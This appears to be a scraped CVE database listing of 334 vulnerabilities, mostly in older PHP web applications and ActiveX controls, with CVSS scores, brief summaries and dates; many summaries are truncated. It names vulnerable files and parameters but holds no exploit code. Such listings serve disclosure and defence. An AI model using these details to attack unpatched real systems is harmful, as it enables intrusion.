Max CVSS: 10.0 | Min CVSS: 2.6 | Total Count: 334
ID | CVSS | Summary | Last (major) update | Published
CVE-2006-0565 7.5
PHP remote file include vulnerability in inc/backend_settings.php in Loudblog 0.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the $GLOBALS[path] parameter.
19-02-2017 - 00:11 06-02-2006 - 18:02
CVE-2005-3390 7.5
The RFC1867 file upload feature in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when register_globals is enabled, allows remote attackers to modify the GLOBALS array and bypass security protections of PHP applications via a multipart/form-data POST reque
07-12-2016 - 22:00 01-11-2005 - 07:47
CVE-2006-2065 7.5
SQL injection vulnerability in save.php in PHPSurveyor 0.995 and earlier allows remote attackers to execute arbitrary SQL commands via the surveyid cookie. NOTE: this issue could be leveraged to execute arbitrary PHP code, as demonstrated by inserti
18-11-2016 - 22:00 27-04-2006 - 09:34
CVE-2006-4673 2.6
Global variable overwrite vulnerability in maincore.php in PHP-Fusion 6.01.4 and earlier uses the extract function on the superglobals, which allows remote attackers to conduct SQL injection attacks via the _SERVER[REMOTE_ADDR] parameter to news.php.
17-10-2016 - 23:40 11-09-2006 - 12:04
CVE-2005-3681 7.5
SQL injection vulnerability in viewcat.php in XOOPS WF-Downloads module 2.05 allows remote attackers to execute arbitrary SQL commands via the list parameter.
17-10-2016 - 23:36 18-11-2005 - 18:03
CVE-2005-3649 2.6
jumpto.php in Moodle 1.5.2 allows remote attackers to redirect users to other sites via the jump parameter.
17-10-2016 - 23:36 17-11-2005 - 06:02
CVE-2005-3259 7.5
Multiple SQL injection vulnerabilities in versatileBulletinBoard (vBB) 1.0.0 RC2 allow remote attackers to execute arbitrary SQL commands and bypass authentication via the (1) login field, (2) "search this thread" feature, (3) "search for posts" feat
17-10-2016 - 23:34 20-10-2005 - 06:02
CVE-2005-3236 6.8
Multiple SQL injection vulnerabilities in Cyphor 0.19 allow remote attackers to execute arbitrary SQL and obtain administrative access via (1) the fid parameter of newmsg.php, which can enable XSS attacks when the SQL syntax is invalid or (2) the nic
17-10-2016 - 23:34 14-10-2005 - 06:02
CVE-2005-3201 7.5
SQL injection vulnerability in news.php for Utopia News Pro (UNP) 1.1.3, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to execute arbitrary SQL via the newsid parameter.
17-10-2016 - 23:33 14-10-2005 - 06:02
CVE-2005-3200 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Utopia News Pro (UNP) 1.1.3 and 1.1.4 allow remote attackers to inject arbitrary web script or HTML via (1) the sitetitle parameter in header.php and (2) the version and (3) query_count parameter
17-10-2016 - 23:33 14-10-2005 - 06:02
CVE-2005-3157 7.5
SQL injection vulnerability in messages.php in PHP-Fusion 6.00.109 allows remote attackers to execute arbitrary SQL commands via the msg_send parameter, a different vulnerability than CVE-2005-3158 and CVE-2005-3159.
17-10-2016 - 23:33 06-10-2005 - 06:02
CVE-2005-3130 7.5
SQL injection vulnerability in lucidCMS 1.0.11 allows remote attackers to execute arbitrary SQL commands via the login field.
17-10-2016 - 23:32 04-10-2005 - 18:02
CVE-2005-3063 7.5
SQL injection vulnerability in MailGust 1.9 allows remote attackers to execute arbitrary SQL commands via the email field on the password reminder page.
17-10-2016 - 23:32 27-09-2005 - 15:03
CVE-2005-3048 6.4
Directory traversal vulnerability in index.php in PhpMyFaq 1.5.1 allows remote attackers to read arbitrary files or include arbitrary PHP files via a .. (dot dot) in the LANGCODE parameter, which also allows direct code injection via the User Agent f
17-10-2016 - 23:32 23-09-2005 - 20:03
CVE-2005-3045 7.5
SQL injection vulnerability in search.php in My Little Forum 1.5 and 1.6 beta allows remote attackers to execute arbitrary SQL commands via the phrase field.
17-10-2016 - 23:32 23-09-2005 - 20:03
CVE-2005-2956 5.0
ATutor 1.5.1, and possibly earlier versions, stores temporary chat logs under the web document root with insufficient access control and predictable filenames, which allows remote attackers to obtain user chat conversations via direct requests to tho
17-10-2016 - 23:31 16-09-2005 - 18:03
CVE-2005-2954 7.5
SQL injection vulnerability in password_reminder.php in ATutor before 1.5.1 pl1 allows remote attackers to execute arbitrary SQL commands via the email field.
17-10-2016 - 23:31 16-09-2005 - 18:03
CVE-2005-2951 7.5
Directory traversal vulnerability in security.inc.php in AzDGDatingLite 2.1.3, and possibly earlier versions, allows remote attackers to execute arbitrary PHP commands via ".." sequences and "%00" (trailing null byte) characters in the l parameter, w
17-10-2016 - 23:31 16-09-2005 - 18:03
CVE-2005-2892 5.0
Directory traversal vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to read arbitrary files via ".." sequences and "%00" (trailing null byte) in the u parameter.
17-10-2016 - 23:31 14-09-2005 - 16:03
CVE-2005-2792 5.0
Directory traversal vulnerability in welcome.php in phpLDAPadmin 0.9.6 and 0.9.7 allows remote attackers to read arbitrary files via a .. (dot dot) in the custom_welcome_page parameter.
17-10-2016 - 23:30 02-09-2005 - 19:03
CVE-2005-2777 7.5
Looking Glass 20040427 allows remote attackers to execute arbitrary commands via shell metacharacters in the DNS lookup query field.
17-10-2016 - 23:30 02-09-2005 - 19:03
CVE-2005-2569 4.3
Multiple cross-site scripting (XSS) vulnerabilities in FunkBoard 0.66CF, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the fbusername or fbpassword parameter to (1) editpost.php, (2) prefs.php, (3) n
17-10-2016 - 23:28 16-08-2005 - 00:00
CVE-2005-2562 7.5
SQL injection vulnerability in Gravity Board X (GBX) 1.1 allows remote attackers to execute arbitrary SQL commands and bypass authentication via the login field.
17-10-2016 - 23:28 16-08-2005 - 00:00
CVE-2005-2540 5.0
CRLF injection vulnerability in FlatNuke 2.5.5 and possibly earlier versions allows remote attackers to execute arbitrary PHP commands via an ASCII char 13 (carriage return) in the signature field, which is injected into a PHP script without a preced
17-10-2016 - 23:28 10-08-2005 - 00:00
CVE-2005-2539 4.3
Multiple cross-site scripting (XSS) vulnerabilities in FlatNuke 2.5.5 and possibly earlier versions allow remote attackers to inject arbitrary web script or HTML via the (1) bodycolor, (2) backimage, (3) theme, or (4) logo parameter to structure.php,
17-10-2016 - 23:28 10-08-2005 - 00:00
CVE-2012-0284 9.3
Stack-based buffer overflow in the SetSource method in the Cisco Linksys PlayerPT ActiveX control 1.0.0.15 in PlayerPT.ocx on the Cisco WVC200 Wireless-G PTZ Internet video camera allows remote attackers to execute arbitrary code via a long URL in th
06-09-2016 - 12:43 19-07-2012 - 11:55
CVE-2007-2430 7.8
shared/code/tce_tmx.php in TCExam 4.0.011 and earlier allows remote attackers to create arbitrary PHP files in cache/ by placing file contents and directory traversal manipulations into a SessionUserLang cookie to public/code/index.php.
26-08-2016 - 21:59 01-05-2007 - 20:19
CVE-2011-5035 5.0
Oracle Glassfish 2.1.1, 3.0.1, and 3.1.1, as used in Communications Server 2.0, Sun Java System Application Server 8.1 and 8.2, and possibly other products, computes hash values for form parameters without restricting the ability to trigger hash coll
22-08-2016 - 22:04 29-12-2011 - 20:55
CVE-2011-4885 5.0
PHP before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
22-08-2016 - 22:04 29-12-2011 - 20:55
CVE-2013-4810 10.0
HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServ
29-06-2016 - 10:12 16-09-2013 - 09:01
CVE-2012-0874 6.8
The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker servlets in JBoss Enterprise Application Platform (EAP) before 5.2.0, Web Platform (EWP) before 5.2.0, BRMS Platform before 5.3.1, and SOA Platform before 5.3.1 do not require authentica
17-01-2015 - 21:59 05-02-2013 - 18:55
CVE-2012-2052 9.3
Stack-based buffer overflow in the U3D.8BI library plugin in Adobe Photoshop CS5 12.x before 12.0.5 and CS5.1 12.1.x before 12.1.1 allows remote attackers to execute arbitrary code via a long Collada asset element in a DAE file, as demonstrated by th
20-06-2014 - 14:04 19-06-2014 - 16:55
CVE-2011-4858 5.0
Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU con
05-03-2014 - 23:33 05-01-2012 - 14:55
CVE-2007-4607 9.3
Buffer overflow in the EasyMailSMTPObj ActiveX control in emsmtp.dll 6.0.1 in the Quiksoft EasyMail SMTP Object, as used in Postcast Server Pro 3.0.61 and other products, allows remote attackers to execute arbitrary code via a long argument to the Su
12-12-2013 - 22:53 30-08-2007 - 20:17
CVE-2006-0147 7.5
Dynamic code evaluation vulnerability in tests/tmssql.php test script in ADOdb for PHP before 4.70, as used in multiple products including (1) Mantis, (2) PostNuke, (3) Moodle, (4) Cacti, (5) Xaraya, (6) PhpOpenChat, possibly (7) MAXdev MD-Pro, and (
30-08-2013 - 00:52 09-01-2006 - 18:03
CVE-2006-7247 7.5
SQL injection vulnerability in the Weblinks (com_weblinks) component for Joomla! and Mambo 1.0.9 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter.
16-08-2013 - 01:46 06-09-2012 - 15:55
CVE-2010-0219 10.0
Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by u
09-05-2013 - 23:14 18-10-2010 - 13:00
CVE-2012-5897 9.3
The (1) SimpleTree and (2) ReportTree classes in the ARDoc ActiveX control (ARDoc.dll) in Quest InTrust 10.4.0.853 and earlier do not properly implement the SaveToFile method, which allows remote attackers to write or overwrite arbitrary files via th
15-01-2013 - 00:00 17-11-2012 - 16:55
CVE-2012-5896 10.0
The Annotation Objects Extension ActiveX control in AnnotateX.dll in Quest InTrust 10.4.0.853 and earlier does not properly implement the Add method, which allows remote attackers to execute arbitrary code via a memory address in the first argument,
19-11-2012 - 00:00 17-11-2012 - 16:55
CVE-2011-5034 7.8
Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted pa
06-11-2012 - 00:05 29-12-2011 - 20:55
CVE-2007-2539 7.8
The show_files function in RunCms 1.5.2 and earlier allows remote attackers to obtain sensitive information (file existence and file metadata) via unspecified vectors.
05-11-2012 - 22:38 08-05-2007 - 21:19
CVE-2007-2538 7.5
SQL injection vulnerability in class/debug/debug_show.php in RunCms 1.5.2 and earlier allows remote attackers to execute arbitrary SQL commands via the executed_queries array parameter.
05-11-2012 - 22:38 08-05-2007 - 21:19
CVE-2007-2222 9.3
Multiple buffer overflows in the (1) ActiveListen (Xlisten.dll) and (2) ActiveVoice (Xvoice.dll) speech controls, as used by Microsoft Internet Explorer 5.01, 6, and 7, allow remote attackers to execute arbitrary code via a crafted ActiveX object tha
05-11-2012 - 22:37 12-06-2007 - 15:30
CVE-2007-3294 7.5
Multiple buffer overflows in libtidy, as used in the Tidy extension for PHP 5.2.3 and possibly other products, allow context-dependent attackers to execute arbitrary code via (1) a long second argument to the tidy_parse_string function or (2) an unsp
30-10-2012 - 22:38 20-06-2007 - 17:30
CVE-2006-4602 7.5
Unrestricted file upload vulnerability in jhot.php in TikiWiki 1.9.4 Sirius and earlier allows remote attackers to execute arbitrary PHP code via a filepath parameter that contains a filename with a .php extension, which is uploaded to the img/wiki/
24-10-2012 - 00:00 06-09-2006 - 20:04
CVE-2012-5306 9.3
Stack-based buffer overflow in the SelectDirectory method in DcsCliCtrl.dll in Camera Stream Client ActiveX Control, as used in D-Link DCS-5605 PTZ IP Network Camera, allows remote attackers to cause a denial of service (crash) and possibly execute a
08-10-2012 - 00:00 06-10-2012 - 18:55
CVE-2007-2856 9.3
Buffer overflow in the Dart Communications PowerTCP ZIP Compression ActiveX control in DartZip.dll 1.8.5.3, when Internet Explorer 6 is used, allows user-assisted remote attackers to execute arbitrary code via a long first argument to the QuickZip fu
04-10-2012 - 00:00 24-05-2007 - 15:30
CVE-2011-5167 9.3
Heap-based buffer overflow in the SetDevNames method of the Tidestone Formula One ActiveX control (TTF16.ocx) 6.3.5 Build 1 in Oracle Hyperion Strategic Finance 12.x and possibly earlier allows remote attackers to execute arbitrary code via a long st
17-09-2012 - 00:00 15-09-2012 - 13:55
CVE-2012-4876 10.0
Stack-based buffer overflow in the UltraMJCam ActiveX Control in TRENDnet SecurView TV-IP121WN Wireless Internet Camera allows remote attackers to execute arbitrary code via a long string to the OpenFileDlg method.
07-09-2012 - 00:00 06-09-2012 - 17:55
CVE-2012-4598 9.3
An unspecified ActiveX control in McAfee Virtual Technician (MVT) before 6.4, and ePO-MVT, allows remote attackers to execute arbitrary code or cause a denial of service (Internet Explorer crash) via a crafted web site.
22-08-2012 - 00:00 22-08-2012 - 06:42
CVE-2012-1196 5.0
Directory traversal vulnerability in the VulCore web service (WSVulnerabilityCore/VulCore.asmx) in Lenovo ThinkManagement Console 9.0.3 allows remote attackers to delete arbitrary files via a .. (dot dot) in the filename parameter in a SetTaskLogByFi
29-02-2012 - 00:00 17-02-2012 - 19:55
CVE-2012-1195 7.5
Unrestricted file upload vulnerability in andesk/managementsuite/core/core.anonymous/ServerSetup.asmx in the ServerSetup web service in Lenovo ThinkManagement Console 9.0.3 allows remote attackers to execute arbitrary code by uploading a file with an
29-02-2012 - 00:00 17-02-2012 - 19:55
CVE-2012-1065 4.3
Insecure method vulnerability in TuxScripting.dll in the TuxSystem ActiveX control in 2X ApplicationServer 10.1 Build 1224 allows remote attackers to create or overwrite arbitrary files via the ExportSettings method.
15-02-2012 - 10:17 14-02-2012 - 12:55
CVE-2011-4084
** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2011-4858. Reason: This candidate is a duplicate of CVE-2011-4858. Notes: All CVE users should reference CVE-2011-4858 instead of this candidate. All references and descriptions in t
06-01-2012 - 23:17 29-12-2011 - 20:55
CVE-2006-7070 7.5
Unrestricted file upload vulnerability in manager/media/ibrowser/scripts/rfiles.php in Etomite CMS 0.6.1 and earlier allows remote attackers to upload and execute arbitrary files via an nfile[] parameter with a filename that contains a .php extension
08-12-2011 - 00:00 02-03-2007 - 16:18
CVE-2006-3904 6.8
SQL injection vulnerability in manager/index.php in Etomite CMS 0.6.1 and earlier, with magic_quotes_gpc disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.
08-12-2011 - 00:00 27-07-2006 - 18:04
CVE-2006-0658 5.0
Incomplete blacklist vulnerability in connector.php in FCKeditor 2.0 and 2.2, as used in products such as RunCMS, allows remote attackers to upload and execute arbitrary script files by giving the files specific extensions that are not listed in the
12-10-2011 - 00:00 13-02-2006 - 06:06
CVE-2010-4701 7.6
Heap-based buffer overflow in the CDrawPoly::Serialize function in fxscover.exe in Microsoft Windows Fax Services Cover Page Editor 5.2 r2 in Windows XP Professional SP3, Server 2003 R2 Enterprise Edition SP2, and Windows 7 Professional allows remote
04-10-2011 - 22:50 20-01-2011 - 14:00
CVE-2006-2516 5.1
mainfile.php in XOOPS 2.0.13.2 and earlier, when register_globals is enabled, allows remote attackers to overwrite variables such as $xoopsOption['nocommon'] and conduct directory traversal attacks or include PHP files via (1) xoopsConfig[language] t
03-10-2011 - 00:00 22-05-2006 - 18:02
CVE-2006-3571 2.6
Multiple cross-site scripting (XSS) vulnerabilities in interna/hilfe.php in Papoo 3 RC3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) titel or (2) ausgabe parameters.
13-09-2011 - 00:00 12-07-2006 - 21:05
CVE-2006-0659 6.8
Multiple PHP remote file include vulnerabilities in RunCMS 1.2 and earlier, with register_globals and allow_url_fopen enabled, allow remote attackers to execute arbitrary code via the bbPath[path] parameter in (1) class.forumposts.php and (2) forumpo
08-09-2011 - 00:00 13-02-2006 - 06:06
CVE-2006-4042 7.5
Multiple SQL injection vulnerabilities in trackback.php in myWebland myBloggie 2.1.4 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) title, (2) url, (3) excerpt, or (4) blog_name parameters.
06-09-2011 - 00:00 09-08-2006 - 19:04
CVE-2006-1031 7.5
config/config_inc.php in iGENUS Webmail 2.02 and earlier allows remote attackers to include arbitrary local files via the SG_HOME parameter.
23-08-2011 - 00:00 07-03-2006 - 06:02
CVE-2006-3775 7.5
SQL injection vulnerability in the init function in class_session.php in MyBB (aka MyBulletinBoard) 1.1.5 allows remote attackers to execute arbitrary SQL commands via the CLIENT-IP HTTP header ($_SERVER['HTTP_CLIENT_IP'] variable), as utilized by in
08-08-2011 - 00:00 24-07-2006 - 08:19
CVE-2005-3996 5.1
SQL injection vulnerability in admin/password_forgotten.php in Zen Cart 1.2.6d and earlier allows remote attackers to execute arbitrary SQL commands via the admin_email parameter.
08-08-2011 - 00:00 04-12-2005 - 19:03
CVE-2005-3686 7.5
SQL injection vulnerability in search.inc.php in Unclassified NewsBoard before 1.5.3 Patch 4 allows remote attackers to execute arbitrary SQL commands via the (1) DateFrom or (2) DateUntil parameter to forum.php.
05-08-2011 - 00:00 18-11-2005 - 20:03
CVE-2006-0146 7.5
The server.php test script in ADOdb for PHP before 4.70, as used in multiple products including (1) Mantis, (2) PostNuke, (3) Moodle, (4) Cacti, (5) Xaraya, (6) PHPOpenChat, (7) MAXdev MD-Pro, and (8) MediaBeez, when the MySQL root password is empty,
14-06-2011 - 00:00 09-01-2006 - 18:03
CVE-2008-4771 9.3
Stack-based buffer overflow in VATDecoder.VatCtrl.1 ActiveX control in (1) 4xem VatCtrl Class (VATDecoder.dll 1.0.0.27 and 1.0.0.51), (2) D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5), (3) Vivotek RTSP MPEG4 SP Control (RtspVapgDecoderNew.
07-03-2011 - 22:13 28-10-2008 - 15:20
CVE-2008-4346 7.5
Directory traversal vulnerability in TalkBack 2.3.6 and 2.3.6.4 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter to comments.php, a different vector than CVE-2008-3371.
07-03-2011 - 22:12 30-09-2008 - 14:15
CVE-2008-0399 6.8
Multiple buffer overflows in Toshiba Surveillance (Surveillix) RecordSend ActiveX control (MeIpCamX.DLL 1.0.0.4) allow remote attackers to execute arbitrary code via long arguments to the (1) SetPort and (2) SetIpAddress methods.
07-03-2011 - 22:04 23-01-2008 - 07:00
CVE-2008-0380 10.0
Buffer overflow in the Digital Data Communications RtspVaPgCtrl ActiveX control (RtspVapgDecoder.dll 1.1.0.29) allows remote attackers to execute arbitrary code via a long MP4Prefix property.
07-03-2011 - 22:04 22-01-2008 - 15:00
CVE-2007-6493 10.0
The IMWeb.IMWebControl.1 ActiveX control in IMWeb.dll 7.0.0.x, and possibly IMWebControl.dll, in iMesh 7.1.0.x and earlier allows remote attackers to execute arbitrary code via a certain argument to the SetHandler method.
07-03-2011 - 22:02 20-12-2007 - 15:46
CVE-2007-6457 5.0
Stack-based buffer overflow in the webmail feature in SurgeMail 38k4 allows remote attackers to cause a denial of service (crash) via a long Host header.
07-03-2011 - 22:02 19-12-2007 - 19:46
CVE-2007-6453 10.0
Directory traversal vulnerability in raidenhttpd-admin/workspace.php in RaidenHTTPD 2.0.19, when the WebAdmin function is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the ulang parameter.
07-03-2011 - 22:02 19-12-2007 - 19:46
CVE-2007-5779 7.5
Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote attackers to execute arbitrary code via a long argument to the OpenUrl method.
07-03-2011 - 22:01 01-11-2007 - 12:46
CVE-2007-5219 6.4
Directory traversal vulnerability in the CLAVSetting.CLSetting.1 ActiveX control in CLAVSetting.DLL 1.00.1829 in the CLAVSetting module in CyberLink PowerDVD 7.0 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in the
07-03-2011 - 22:00 04-10-2007 - 20:17
CVE-2007-4646 10.0
Buffer overflow in the pop3 service in Hexamail Server 3.0.0.001 Lite allows remote attackers to cause a denial of service (daemon crash) and probably execute arbitrary code via a long USER command.
07-03-2011 - 21:58 31-08-2007 - 19:17
CVE-2007-4489 6.8
Buffer overflow in the IUAComFormX ActiveX control in uacomx.ocx 2.0.1 in the eCentrex VOIP Client module allows remote attackers to execute arbitrary code via a long Username argument to the ReInit method.
07-03-2011 - 21:58 22-08-2007 - 19:17
CVE-2007-3536 7.6
Multiple buffer overflows in the AMX NetLinx VNC (AmxVnc) ActiveX control in AmxVnc.dll 1.0.13.0 allow remote attackers to execute arbitrary code via long (1) Host, (2) Password, or (3) LogFile property values.
07-03-2011 - 21:56 03-07-2007 - 16:30
CVE-2007-3111 10.0
Buffer overflow in the Provideo Camimage ActiveX control in ISSCamControl.dll 1.0.1.5, when Internet Explorer 6 is used on Windows 2000 SP4, allows remote attackers to execute arbitrary code via a long URL property value.
07-03-2011 - 21:55 07-06-2007 - 17:30
CVE-2007-2938 10.0
Buffer overflow in the BaseRunner ActiveX control in the Ademco ATNBaseLoader100 Module (ATNBaseLoader100.dll) 5.4.0.6, when Internet Explorer 6 is used, allows remote attackers to execute arbitrary code via a long argument to the (1) Send485CMD meth
07-03-2011 - 21:55 30-05-2007 - 20:30
CVE-2007-2814 7.5
Multiple stack-based buffer overflows in the Pegasus ImagN' ActiveX control (IMW32O40.OCX) 4.00.041 allow remote attackers to execute arbitrary code via (1) a long FileName parameter, or unspecified vectors involving the (2) BeginReport, (3) CreatePi
07-03-2011 - 21:55 22-05-2007 - 15:30
CVE-2007-0812 7.5
SQL injection vulnerability in pms.php in Woltlab Burning Board (wBB) Lite 1.0.2pl3e and earlier allows remote authenticated users to execute arbitrary SQL commands via the pmid[0] parameter.
07-03-2011 - 21:50 07-02-2007 - 06:28
CVE-2007-0639 7.5
Multiple static code injection vulnerabilities in error.php in GuppY 4.5.16 and earlier allow remote attackers to inject arbitrary PHP code into a .inc file in the data/ directory via (1) a REMOTE_ADDR cookie or (2) a cookie specifying an element of
07-03-2011 - 21:50 31-01-2007 - 16:28
CVE-2007-0340 7.5
SQL injection vulnerability in inc/header.inc.php in ThWboard 3.0b2.84-php5 and earlier allows remote attackers to execute arbitrary SQL commands via the board[styleid] parameter to index.php.
07-03-2011 - 21:49 17-01-2007 - 21:28
CVE-2007-0261 10.0
snews.php in sNews 1.5.30 and earlier does not properly exit when authentication fails, which allows remote attackers to perform unauthorized administrative actions, as demonstrated by changing an administrative password via the changeup task, and by
07-03-2011 - 21:49 16-01-2007 - 18:28
CVE-2007-0233 7.5
wp-trackback.php in WordPress 2.0.6 and earlier does not properly unset variables when the input data includes a numeric parameter with a value matching an alphanumeric parameter's hash value, which allows remote attackers to execute arbitrary SQL co
07-03-2011 - 21:49 12-01-2007 - 21:28
CVE-2006-7173 10.0
Direct static code injection vulnerability in admin.php in PHP-Stats 0.1.9.1b and earlier allows remote attackers to execute arbitrary PHP code via a crafted option_new[report_w_day] parameter in a preferenze action, which can be later accessed via o
07-03-2011 - 21:48 20-03-2007 - 18:19
CVE-2006-7172 7.5
Multiple SQL injection vulnerabilities in php-stats.recphp.php in PHP-Stats 0.1.9.1b and earlier allow remote attackers to execute arbitrary code via a leading dotted-quad IP address string in the (1) PC-REMOTE-ADDR HTTP header, which is inserted int
07-03-2011 - 21:48 20-03-2007 - 18:19
CVE-2006-7101 7.5
SQL injection vulnerability in admin.php in PHPWind 5.0.1 and earlier allows remote attackers to execute arbitrary SQL commands via the AdminUser cookie.
07-03-2011 - 21:47 03-03-2007 - 16:19
CVE-2006-6880 7.5
Multiple SQL injection vulnerabilities in code/guestadd.php in PHP-Update 2.7 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) newmessage, (2) newname, (3) newwebsite, or (4) newemail parameter.
07-03-2011 - 21:47 31-12-2006 - 00:00
CVE-2006-6879 6.0
Unrestricted file upload vulnerability in admin/uploads.php in PHP-Update 2.7 and earlier allows remote authenticated users to upload arbitrary PHP scripts to the gfx/ and files/ directories via the userfile parameter.
07-03-2011 - 21:47 31-12-2006 - 00:00
CVE-2006-6853 10.0
Buffer overflow in Durian Web Application Server 3.02 freeware on Windows allows remote attackers to execute arbitrary code via a long string in a crafted packet to TCP port 4002.
07-03-2011 - 21:47 31-12-2006 - 00:00
CVE-2006-6661 7.5
Variable overwrite vulnerability in blog.php in PHP-Update 2.7 and earlier allows remote attackers to overwrite arbitrary program variables and execute arbitrary PHP code via multiple vectors that use the extract function, as demonstrated by the (1)
07-03-2011 - 21:46 20-12-2006 - 18:28
CVE-2006-6624 4.0
The FTP Server in Sambar Server 6.4 allows remote authenticated users to cause a denial of service (application crash) via a long series of "./" sequences in the SIZE command.
07-03-2011 - 21:46 18-12-2006 - 06:28
CVE-2006-6237 7.5
SQL injection vulnerability in the decode_cookie function in thread.php in Woltlab Burning Board Lite 1.0.2 allows remote attackers to execute arbitrary SQL commands via the threadvisit Cookie parameter.
07-03-2011 - 21:45 03-12-2006 - 14:28
CVE-2006-5561 7.5
SQL injection vulnerability in admincp.php in Discuz! GBK 5.0.0 allows remote attackers to execute arbitrary SQL commands via the cdb_auth cookie.
07-03-2011 - 21:43 27-10-2006 - 12:07
CVE-2006-5030 7.5
SQL injection vulnerability in modules/messages/index.php in exV2 2.0.4.3 and earlier allows remote authenticated users to execute arbitrary SQL commands via the sort parameter.
07-03-2011 - 21:42 27-09-2006 - 19:07
CVE-2006-4963 6.4
Directory traversal vulnerability in index.php in Exponent CMS 0.96.3 allows remote attackers to read and execute arbitrary local files via a .. (dot dot) sequence in the view parameter in the show_view action in the calendarmodule module, as demonst
07-03-2011 - 21:42 23-09-2006 - 06:07
CVE-2006-4859 7.5
Unrestricted file upload vulnerability in contact.html.php in the Contact (com_contact) component in Limbo (aka Lite Mambo) CMS 1.0.4.2L and earlier allows remote attackers to upload PHP code to the images/contact folder via a filename with a double
07-03-2011 - 21:42 19-09-2006 - 14:07
CVE-2006-4723 5.1
PHP remote file inclusion vulnerability in raidenhttpd-admin/slice/check.php in RaidenHTTPD 1.1.49, when register_globals and WebAdmin is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the SoftParserFileXml parameter.
07-03-2011 - 21:41 12-09-2006 - 12:07
CVE-2006-4558 7.5
DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
07-03-2011 - 21:41 05-09-2006 - 20:04
CVE-2006-4267 7.5
Multiple SQL injection vulnerabilities in CubeCart 3.0.11 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) oid parameter in modules/gateway/Protx/confirmed.php and the (2) x_invoice_num parameter in modules/gateway/Aut
07-03-2011 - 21:40 21-08-2006 - 17:04
CVE-2006-4191 5.1
Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by in
07-03-2011 - 21:40 16-08-2006 - 21:04
CVE-2006-3996 6.5
SQL injection vulnerability in links/index.php in ATutor 1.5.3.1 and earlier allows remote authenticated users to execute arbitrary SQL commands via the (1) desc or (2) asc parameters.
07-03-2011 - 21:40 04-08-2006 - 20:04
CVE-2006-3994 7.5
SQL injection vulnerability in the u2u_send_recp function in u2u.inc.php in XMB (aka extreme message board) 1.9.6 Alpha and earlier allows remote attackers to execute arbitrary SQL commands via the u2uid parameter to u2u.php, which is directly access
07-03-2011 - 21:39 04-08-2006 - 20:04
CVE-2006-3851 7.5
SQL injection vulnerability in upgradev1.php in X7 Chat 2.0.4 and earlier allows remote attackers to execute arbitrary SQL commands via the old_prefix parameter.
07-03-2011 - 21:39 25-07-2006 - 19:04
CVE-2006-3832 7.5
SQL injection vulnerability in index.php in Gerrit van Aaken Loudblog 0.5 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
07-03-2011 - 21:39 25-07-2006 - 09:22
CVE-2006-3611 5.5
Directory traversal vulnerability in pm.php in Phorum 5 allows remote authenticated users to include and execute arbitrary local files via directory traversal sequences in the GLOBALS[template] parameter, as demonstrated by injecting PHP sequences in
07-03-2011 - 21:39 18-07-2006 - 11:46
CVE-2006-3572 7.5
SQL injection vulnerability in forumthread.php in Papoo 3 RC3 and earlier allows remote attackers to execute arbitrary SQL commands via the msgid parameter.
07-03-2011 - 21:38 12-07-2006 - 21:05
CVE-2006-3533 5.8
Multiple cross-site scripting (XSS) vulnerabilities in Pivot 1.30 RC2 and earlier, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) fg, (2) line1, (3) line2, (4) bg, (5) c1, (6) c2, (7) c3, a
07-03-2011 - 21:38 12-07-2006 - 17:05
CVE-2006-3531 7.5
includes/editor/insert_image.php in Pivot 1.30 RC2 and earlier creates the authentication credentials from parameters, which allows remote attackers to obtain privileges and upload arbitrary files via modified (1) pass and (2) session parameters, and
07-03-2011 - 21:38 12-07-2006 - 17:05
CVE-2006-3364 7.5
SQL injection vulnerability in index.php in the NP_SEO plugin in BLOG:CMS before 4.1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
07-03-2011 - 21:38 06-07-2006 - 16:05
CVE-2006-3362 5.1
Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when
07-03-2011 - 21:38 06-07-2006 - 16:05
CVE-2006-3292 7.5
